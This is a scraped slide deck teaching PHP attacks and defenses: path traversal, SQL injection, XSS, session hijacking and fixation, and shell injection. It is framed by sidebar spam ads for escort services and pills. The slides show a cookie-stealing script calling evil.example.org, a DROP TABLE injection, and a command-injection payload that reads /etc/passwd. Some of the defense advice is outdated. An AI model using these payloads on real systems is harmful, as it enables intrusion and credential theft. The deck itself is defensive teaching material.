Diamond Application Development Crafting Solutions with PrecisionSolGuruz
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️anilsa9823
 

Último (20)

Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.js
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptx
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with Precision
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
 
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS LiveVip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
 

PHP Secure Programming

  • 1. 1 PHP Attacks and Defense K.Bala Vignesh kbalavignesh@gmail.com
  • 2. 2 Most Secured computer in the WORLD No Need to secure the OS No Need to secure the S/W No need to do Anything It's Naturally Secured
  • 3. 3 Even No Need to Switch ON
  • 5. 5 Fact : 1 PHP Mainly for Web Programs Fact : 2 Easy To Learn
  • 6. 6 PHP: 20,917,850 domains, 1,224,183 IP addresses Fact : 3 Fact : 4 More Flexible Functions
  • 7. 7 Few Named threats Code Injection SQL Injection Cross Site Script (XSS) Session Hijacking Session Fixation Temp Files abuse Remote Execution More and More unNamed threats...
  • 9. Code Injection 9 Dont directly pass the filenames $filename = $_REQUEST['message']; $message = file_get_contents($filename); print $message; This is ok: http://example.com/myscript.php?message=hello.txt But what if I do like this?: http://example.com/myscript.php?message=passwords.txt
  • 10. Code Injection 10 This is especially important for includes, require and require_once $module = $_REQUEST['module']; include(“lib/$module”); This is ok: http://example.com/cms?module=login.php But what if I do like this?: http://example.com/cms?module=../passwords.ini
  • 11. Defense Code Injection 11 Make sure the value is one you expected, if not...ERROR! $requestedModule = $_REQUEST['module']; switch($requestedModule) { case “login”: $module = “login”; break; case “logout”: $module = “logout”; break; default: $module = “error”; }
  • 13. 13 Form to user search .... $username=$_POST['username']; $query= "SELECT * FROM users WHERE name = ' “ .$username." ' ;" If i give , $username ­­­a' or 't'='t Query will be , "SELECT * FROM users WHERE name = ' a' or 't'='t ';" SQL Injection
  • 14. 14 If i give , $username ­­­a'; DROP TABLE users; SELECT * FROM data WHERE name LIKE '% Query will be , SELECT * FROM users WHERE name = ' a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '% '; SQL Injection
  • 15. 15 Use single quotation eg: "select * from users where user= '.$username.'" Check types of user submitted values is_bool(), is_float(), is_numeric(), is_string(), is_int() , intval() , settype() ,strlen() eg: strpos($query , ';') Escape every questionable character in your query ' " , ; ( ) and keywords "FROM", "LIKE", and "WHERE" mysql_real_escape_string SQL Injection Defense
  • 16. 16 magic_quotes_gpc (default – on ) (deprecation – php 6.0) If Off use addslashes If On , If you don't need stripslashes if (get_magic_quotes_gpc()){ $_GET = array_map('stripslashes', $_GET); $_POST = array_map('stripslashes', $_POST); $_COOKIE = array_map('stripslashes', $_COOKIE); } SQL Injection Defense
  • 17. 17 Mysql Improved Extension $query=mysqli_prepare($connection_string, "select * from user where user= ?"); mysqli_stmt_bind_param($query,"s",$username); mysqli_stmt_execute($query); s­string i­integer d­double b­binary PEAR ­DB, DataObject SQL Injection Defense
  • 18. 18 XSS – Cross Site Scripting
  • 19. 19 1.) Inserting scripts <script> document.location = 'http://evil.example.org/steal_cookies.php?cookies=' + document.cookie </script> 2.) Login 3.) Set Cookies 4.) Executes the scripts XSS 5.) Steals the cookies
  • 20. 20 Remote control of the client browser Reveal the value of a cookie Change links on the page Redirect to another URI Render a bogus form or Any undesirable action ... XSS
  • 21. Defense XSS Encode HTML Entities in All Non­HTML Output 21 htmlentities() Eg: $str = "A 'quote' is <b>bold</b>"; echo htmlentities($str); Outputs Will be ­> A 'quote' is &lt;b&gt;bold&lt;/b&gt; Check the image upload URI (avatar, icon) parse_url Eg: <img src=”http://shopping.example.com/addCart.php?item=123”/> Show the domain name for User submitted Links eg. Not safe ­­> Hey click this to see my photo <a href=”http://badguys.net”>Bala</a> safe ­­> Hey click this to see my photo [badguys.net] Bala
  • 23. 23 What is Session ID ?
  • 24. 24 Victim Attacker Web Server Session ID= AD238723FD32 Session Hijacking
  • 25. 25 Victim Attacker Web Server Session ID= AD238723FD32 Session ID= AD238723FD32 Session Hijacking
  • 26. Session Hijacking 26 Network Eavesdropping ­Promiscuous Mode If Intranet ? Use Switch rather than a Hub If wi­fi ? WEP ­Weired Equivalent Privacy If Internet ? SSL
  • 27. 27 Session Hijacking Unwitting Exposure Sending links See this item ­­­­http:// store.com/items.php?item=0987 it's O.K , if i send like this, http://store.com/items.php?item=0987&phpsessid=34223 How to Avoid ? session.use_trans_sid (turned off by default) session.use_only_cookies (Defaults to 1 (enabled) since PHP 6.0.)
  • 28. 28 2.) If he clicks, http://unsafesite?SID=3423 3. Shows login page Victim Session Fixation Attacker Web Server 1.) See this link http://unsafesite?SID=3423 Set SessionID =3423 session_id($_GET['SID']) 4.) Now Full Access http://unsafesite?SID=3423
  • 29. 29 Session Hijacking Defense Use SSL. Use Cookies Instead of $_GET Variables. (ini_set ('session.use_only_cookies',TRUE); ini_set ('session.use_trans_sid',FALSE); Use Session Timeouts ini_set('session.cookie_lifetime',1200) ini_set('session.gc_maxlifetime) Regenerate IDs for Users with Changed Status session_regenerate_id
  • 31. Remote Execution 31 Injection of Shell commands <?php $filename=$_GET['filename']; $command='/usr/bin/wc $filename”; $words=shell_exec ($command); print “$filename contains $words words.”; ?> This is ok ... wordcount.php?filename=textfile.txt But, What if i give like this ... wordcount.php?filename=%2Fdev%2Fnull%20%7C%20cat%20%2Fetc%2Fpasswd (filename ­­> /dev/null | cat /etc/passwd ) /usr/bin/wc /dev/null |cat /etc/passwd
  • 32. Remote Execution 32 Defense Allow only Trusted , Human Users to Import Code Store uploads outside of Web Document Root Limit allowable filename extensions for upload Use disable_functions directive eg: disable_functions= “eval,phpinfo” Do not include PHP scripts from Remote Servers eg: <?php include ('http://example.net/code/common.php') ?> Properly escape all shell commands escapeshellarg() , escapeshellcmd()
  • 33. 33 Future? ­PHP 6.0 Deprecation Register Globals Big security hole Safe Mode False sense of security Magic Quotes Messed with the data Upcoming changes and features http://www.php.net/~derick/meeting­notes. html http://www.phphacks.com/content/view/49/33/ Rasmus Lerdorf – PHP 6.0 Wish List http://news.php.net/php.internals/17883
  • 34. 34 What to do? Proper Input Validation Dont do Programming + Security Do secure Programming htmlentities, mysql_real_escape_string, parse_url , addslashes ,escapeshellarg, escapeshellcmd... etc SSL Use PEAR , PECL
  • 35. Images From Flickr.com 35 reference­http:// flickr.com/photos/opinicus/246099418/ remote_boy ­http:// flickr.com/photo_zoom.gne?id=331355695&size=l level_cross ­http:// flickr.com/photo_zoom.gne?id=67342604&size=o injection3­http:// flickr.com/photos/fleurdelisa/249435636/ building game1­http:// flickr.com/photo_zoom.gne?id=346575350&size=o computer_baby1­http:// flickr.com/photo_zoom.gne?id=102207751&size=o country_border1 ­http:// flickr.com/photo_zoom.gne?id=48740674&size=l computer_baby ­http:// flickr.com/photo_zoom.gne?id=436594815&size=m hijack ­http:// flickr.com/photo_zoom.gne?id=463129891&size=l dog_security ­http:// flickr.com/photo_zoom.gne?id=2205272682&size=l Id card ­http:// flickr.com/photo_zoom.gne?id=1269802640&size=o
  • 36. 36 Reference Pro PHP Security Chris Snyder , Michael Southwell http://wikipedia.org/ http://www.sitepoint.com/article/php­security­blunders http://phpsec.org/ WWW.google.com
  • 37. 37
  • 38. 38
  • 39. Copyright (c) 2008 Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2 or any later version published by the Free Software Foundation. http://www.gnu.org/copyleft/fdl.html